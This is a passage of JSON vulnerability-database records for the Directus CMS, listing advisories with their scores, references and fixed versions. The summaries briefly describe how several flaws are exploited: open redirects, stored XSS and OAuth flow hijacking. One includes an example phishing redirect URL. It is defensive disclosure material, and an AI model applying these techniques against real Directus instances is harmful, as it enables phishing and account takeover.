"reference_id": "CVE-2024-6534", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534" }, { "reference_url": "https://github.com/advisories/GHSA-q83v-hq3j-4pq3", "reference_id": "GHSA-q83v-hq3j-4pq3", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q83v-hq3j-4pq3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33132?format=api", "purl": "pkg:npm/directus@10.13.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1" } ], "aliases": [ "GHSA-q83v-hq3j-4pq3" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ua8h-tmak-hufd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83730?format=api", "vulnerability_id": "VCID-ufth-uy5w-87fe", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-22032", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14615", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14641", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14642", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14523", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-22032" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22032", "reference_id": "CVE-2026-22032", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22032" }, { "reference_url": "https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23", "reference_id": "dad9576ea9362905cc4de8028d3877caff36dc23", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/" } ], "url": "https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23" }, { "reference_url": "https://github.com/advisories/GHSA-3573-4c68-g8cc", "reference_id": "GHSA-3573-4c68-g8cc", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3573-4c68-g8cc" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc", "reference_id": "GHSA-3573-4c68-g8cc", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36567?format=api", "purl": "pkg:npm/directus@11.14.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.0" } ], "aliases": [ "CVE-2026-22032", "GHSA-3573-4c68-g8cc" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ufth-uy5w-87fe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/173457?format=api", "vulnerability_id": "VCID-uhj5-vc26-t3ga", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to a file uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ \"media_live_embeds\": false }` to the _Options Overrides_ option of the Rich Text HTML interface.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-24814", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.63069", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.63073", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.63061", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.0043", "scoring_system": "epss", "scoring_elements": "0.62959", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-24814" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/pull/12020", "reference_id": "12020", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/" } ], "url": "https://github.com/directus/directus/pull/12020" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24814", "reference_id": "CVE-2022-24814", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24814" }, { "reference_url": "https://github.com/advisories/GHSA-xmjj-3c76-5w84", "reference_id": "GHSA-xmjj-3c76-5w84", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xmjj-3c76-5w84" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84", "reference_id": "GHSA-xmjj-3c76-5w84", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v9.7.0", "reference_id": "v9.7.0", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v9.7.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/20019?format=api", "purl": "pkg:npm/directus@9.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-9t8b-59vc-kbea" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-bsua-aktm-1qfd" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eb1b-zvas-muey" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u121-7x5t-3fcg" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0" } ], "aliases": [ "CVE-2022-24814", "GHSA-xmjj-3c76-5w84" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uhj5-vc26-t3ga" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/39920?format=api", "vulnerability_id": "VCID-v2je-s9mk-e3h1", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL. There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like a an error message \"Your password needs to be updated\" to phish out the current password. Users who login via OAuth2 into Directus may be at risk. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28239", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45892", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.4603", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46044", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46037", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28239" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203", "reference_id": "5477d7d61babd7ffc2f835d399bf79611b15b203", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/" } ], "url": "https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203" }, { "reference_url": "https://docs.directus.io/reference/authentication.html#login-using-sso-providers", "reference_id": "authentication.html#login-using-sso-providers", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/" } ], "url": "https://docs.directus.io/reference/authentication.html#login-using-sso-providers" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28239", "reference_id": "CVE-2024-28239", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28239" }, { "reference_url": "https://github.com/advisories/GHSA-fr3w-2p22-6w7p", "reference_id": "GHSA-fr3w-2p22-6w7p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fr3w-2p22-6w7p" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p", "reference_id": "GHSA-fr3w-2p22-6w7p", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29718?format=api", "purl": "pkg:npm/directus@10.10.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pt9-wpk9-tfhj" }, { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0" } ], "aliases": [ "CVE-2024-28239", "GHSA-fr3w-2p22-6w7p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v2je-s9mk-e3h1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90367?format=api", "vulnerability_id": "VCID-v6mk-ybv3-tyc8", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 11.13.0 that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution. Version 11.13.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64747", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13864", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13895", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.1378", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13893", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64747" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64747", "reference_id": "CVE-2025-64747", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64747" }, { "reference_url": "https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e", "reference_id": "d23525317f0780f04aa1fe7a99171a358e43cb2e", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/" } ], "url": "https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e" }, { "reference_url": "https://github.com/advisories/GHSA-vv2v-pw69-8crf", "reference_id": "GHSA-vv2v-pw69-8crf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vv2v-pw69-8crf" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf", "reference_id": "GHSA-vv2v-pw69-8crf", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ "CVE-2025-64747", "GHSA-vv2v-pw69-8crf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v6mk-ybv3-tyc8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71665?format=api", "vulnerability_id": "VCID-v9s1-9n1m-bubs", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus's Single Sign-On (SSO) login pages lacked a Cross-Origin-Opener-Policy (COOP) HTTP response header. Without this header, a malicious cross-origin window that opens the Directus login page retains the ability to access and manipulate the window object of that page. An attacker can exploit this to intercept and redirect the OAuth authorization flow to an attacker-controlled OAuth client, causing the victim to unknowingly grant access to their authentication provider account (e.g. Google, Discord). This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35408", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02087", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02079", "published_at": "2026-06-13T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00955", "published_at": "2026-06-11T12:55:00Z" }, { "value": "9e-05", "scoring_system": "epss", "scoring_elements": "0.00953", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35408" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35408", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35408" }, { "reference_url": "https://github.com/advisories/GHSA-8m32-p958-jg99", "reference_id": "GHSA-8m32-p958-jg99", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8m32-p958-jg99" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99", "reference_id": "GHSA-8m32-p958-jg99", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv3.1", 